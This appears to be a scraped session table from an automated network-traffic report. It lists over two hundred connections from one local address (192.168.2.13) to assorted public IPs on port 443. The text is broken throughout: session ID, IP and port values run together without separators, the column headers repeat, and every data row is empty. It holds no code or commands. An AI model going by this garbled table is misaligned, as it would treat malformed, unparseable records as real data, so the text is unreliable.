                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18172192.168.2.133503686.211.91.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18173192.168.2.133908246.60.205.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18174192.168.2.133343463.143.246.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18175192.168.2.1355434173.73.223.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18176192.168.2.1355998125.186.144.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18177192.168.2.1344416188.160.227.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18178192.168.2.1341688195.91.16.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18179192.168.2.1344392117.224.22.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18180192.168.2.134616469.8.3.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18181192.168.2.1354950101.79.52.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18182192.168.2.1360022109.156.150.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18183192.168.2.1333016174.30.73.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18184192.168.2.133542657.47.180.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18185192.168.2.134801486.34.8.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18186192.168.2.133370262.176.72.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18187192.168.2.1338284129.254.9.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18188192.168.2.134813473.210.83.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18189192.168.2.1348522159.17.176.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18190192.168.2.1353738217.122.179.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18191192.168.2.1354548114.233.50.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192192.168.2.1360190180.247.154.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18193192.168.2.1333300142.90.167.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18194192.168.2.1340362124.176.174.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18195192.168.2.134689840.161.121.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18196192.168.2.1352060164.127.0.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18197192.168.2.1355042205.247.160.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18198192.168.2.1335408124.106.176.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18199192.168.2.134210418.149.83.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18200192.168.2.1333562103.165.142.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18201192.168.2.135977220.169.171.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18202192.168.2.1338228116.254.46.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18203192.168.2.1333512177.223.250.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18204192.168.2.1346006110.109.51.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18205192.168.2.1336332139.27.104.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18206192.168.2.1360878136.33.215.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18207192.168.2.1342860180.217.58.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18208192.168.2.135972227.86.170.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18209192.168.2.133877492.236.212.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18210192.168.2.133612449.238.21.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18211192.168.2.133294657.106.98.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18212192.168.2.1349826115.184.37.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18213192.168.2.133417683.85.65.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18214192.168.2.1354222139.110.78.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18215192.168.2.1343638145.0.218.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18216192.168.2.135655683.42.219.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18217192.168.2.1356268146.209.87.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18218192.168.2.133617488.242.208.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18219192.168.2.133530673.115.194.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18220192.168.2.1358922100.141.217.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18221192.168.2.1333230156.117.220.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18222192.168.2.133686261.230.171.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18223192.168.2.1360800179.75.174.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18224192.168.2.1335636138.181.1.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18225192.168.2.1351916140.76.235.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18226192.168.2.133349671.39.200.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18227192.168.2.1333742131.234.22.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18228192.168.2.134689093.187.44.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18229192.168.2.1344832211.136.25.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18230192.168.2.1341134195.220.208.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18231192.168.2.1339986159.221.231.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18232192.168.2.135429083.193.228.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18233192.168.2.1342602134.44.85.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18234192.168.2.134698899.78.239.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18235192.168.2.135490862.56.66.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18236192.168.2.1347466209.43.23.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18237192.168.2.1356870166.192.28.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18238192.168.2.1335634158.101.232.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18239192.168.2.1337000149.140.243.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18240192.168.2.1360010186.47.54.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18241192.168.2.1339508172.228.247.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18242192.168.2.1346824118.50.127.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18243192.168.2.1348956171.210.27.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18244192.168.2.135859038.115.229.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18245192.168.2.1354992146.77.69.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18246192.168.2.1346600125.228.61.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18247192.168.2.133545843.216.103.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18248192.168.2.1360136124.209.29.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18249192.168.2.1354426114.17.70.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18250192.168.2.1360898193.58.225.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18251192.168.2.1356168130.250.52.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18252192.168.2.1360228189.191.17.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18253192.168.2.135986423.107.18.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18254192.168.2.135746819.151.26.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18255192.168.2.1347562145.189.94.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18256192.168.2.1337144206.68.86.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18257192.168.2.135250462.161.22.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18258192.168.2.135086247.42.82.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18259192.168.2.1337920121.24.125.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18260192.168.2.1336938207.42.151.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18261192.168.2.1344004107.162.192.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18262192.168.2.1341322149.92.186.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18263192.168.2.135138483.194.52.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18264192.168.2.1345216162.31.118.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18265192.168.2.1337996174.66.102.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18266192.168.2.1347216167.181.96.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18267192.168.2.1347146113.147.208.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18268192.168.2.1341482113.203.194.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18269192.168.2.1356348169.28.18.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18270192.168.2.1348638169.6.4.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18271192.168.2.1359200143.122.169.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18272192.168.2.1344532104.153.163.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18273192.168.2.1350084169.20.39.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18274192.168.2.1345314167.111.173.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18275192.168.2.1338840153.56.113.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18276192.168.2.133564024.246.148.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18277192.168.2.133827642.132.101.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18278192.168.2.1338414139.156.105.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18279192.168.2.1333540213.115.124.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18280192.168.2.1349010191.27.13.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18281192.168.2.1359720195.6.144.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18282192.168.2.1350236187.117.146.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18283192.168.2.1342980145.123.164.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18284192.168.2.1360288162.226.231.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18285192.168.2.1356336101.229.233.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18286192.168.2.1334552144.96.44.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18287192.168.2.1338214190.227.106.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18288192.168.2.135075649.50.196.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18289192.168.2.1333918109.177.174.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18290192.168.2.1352698204.33.237.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18291192.168.2.1337188192.236.244.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18292192.168.2.1332970204.205.216.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18293192.168.2.1337938162.163.174.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18294192.168.2.135414095.156.7.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18295192.168.2.1333370167.41.85.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18296192.168.2.133465863.232.11.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18297192.168.2.1340316169.106.97.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18298192.168.2.1343876105.238.61.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18299192.168.2.1351690202.193.76.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18300192.168.2.1339240162.161.10.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18301192.168.2.1336634131.95.230.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18302192.168.2.1358726160.122.148.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18303192.168.2.1342878174.179.134.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18304192.168.2.1333260200.238.161.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18305192.168.2.135510097.92.69.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18306192.168.2.1342216164.204.173.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18307192.168.2.133299652.254.243.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18308192.168.2.1335090150.94.234.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18309192.168.2.133879685.118.236.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18310192.168.2.133290874.65.35.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18311192.168.2.1350436204.210.129.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18312192.168.2.1349518111.102.70.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18313192.168.2.1334528207.134.202.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18314192.168.2.1341784123.207.67.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18315192.168.2.1333674171.195.171.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18316192.168.2.135062893.199.53.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18317192.168.2.1338148114.71.61.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18318192.168.2.1340414112.107.179.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18319192.168.2.1333546218.49.34.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18320192.168.2.1344132113.32.247.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18321192.168.2.13474981.33.146.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18322192.168.2.1339862151.81.152.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18323192.168.2.1354764202.208.241.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18324192.168.2.1344748183.203.132.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18325192.168.2.1340410119.102.239.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18326192.168.2.135521237.221.91.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18327192.168.2.1333984116.252.111.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18328192.168.2.135497824.99.115.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18329192.168.2.1359018213.246.178.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18330192.168.2.1351428190.84.121.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18331192.168.2.134520625.228.158.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18332192.168.2.1341978159.187.74.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18333192.168.2.1350776130.15.121.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18334192.168.2.133475287.2.76.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18335192.168.2.1359458180.7.44.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18336192.168.2.1337644188.184.133.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18337192.168.2.134232817.219.211.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18338192.168.2.13526942.11.123.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18339192.168.2.134299046.116.166.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18340192.168.2.1342736126.249.133.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18341192.168.2.1360566148.41.215.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18342192.168.2.133722839.75.85.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18343192.168.2.1350964111.102.11.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18344192.168.2.1335952121.195.147.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18345192.168.2.134838213.59.206.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18346192.168.2.1341620207.87.59.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18347192.168.2.135447497.221.138.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18348192.168.2.1351110131.185.166.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18349192.168.2.1344866119.60.32.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18350192.168.2.1342912101.77.158.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18351192.168.2.13422765.103.180.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18352192.168.2.1352344193.80.185.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18353192.168.2.1335758207.224.30.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18354192.168.2.1346118156.249.237.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18355192.168.2.1333234145.58.89.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18356192.168.2.135220274.85.161.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18357192.168.2.136045846.124.239.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18358192.168.2.133300672.200.58.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18359192.168.2.133881666.17.215.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18360192.168.2.1337662152.169.234.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18361192.168.2.133880438.163.47.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18362192.168.2.1334376221.201.30.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18363192.168.2.135127462.243.87.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18364192.168.2.135704038.137.207.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18365192.168.2.133601297.122.93.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18366192.168.2.136029077.160.213.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18367192.168.2.1347566142.236.27.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18368192.168.2.1349486170.35.167.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18369192.168.2.1346366120.110.137.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18370192.168.2.1337140207.171.249.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18371192.168.2.1357912115.237.56.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18372192.168.2.134656890.80.23.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18373192.168.2.13348641.11.25.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18374192.168.2.13453102.154.222.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18375192.168.2.1335060145.11.84.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18376192.168.2.1356298197.224.51.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18377192.168.2.1334924144.97.25.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18378192.168.2.135027088.133.62.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18379192.168.2.1358426209.246.242.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18380192.168.2.1336028143.19.15.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18381192.168.2.135139482.102.238.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18382192.168.2.134317825.55.240.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18383192.168.2.1351188179.22.38.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18384192.168.2.1352880143.213.132.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18385192.168.2.135517286.48.13.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18386192.168.2.1355204164.204.122.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18387192.168.2.1346666139.4.75.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18388192.168.2.1351154116.80.5.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18389192.168.2.134699848.114.68.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18390192.168.2.134846038.24.172.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18391192.168.2.1334704206.219.88.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18392192.168.2.1333156204.223.211.172443
                                                TimestampBytes transferredDirectionData


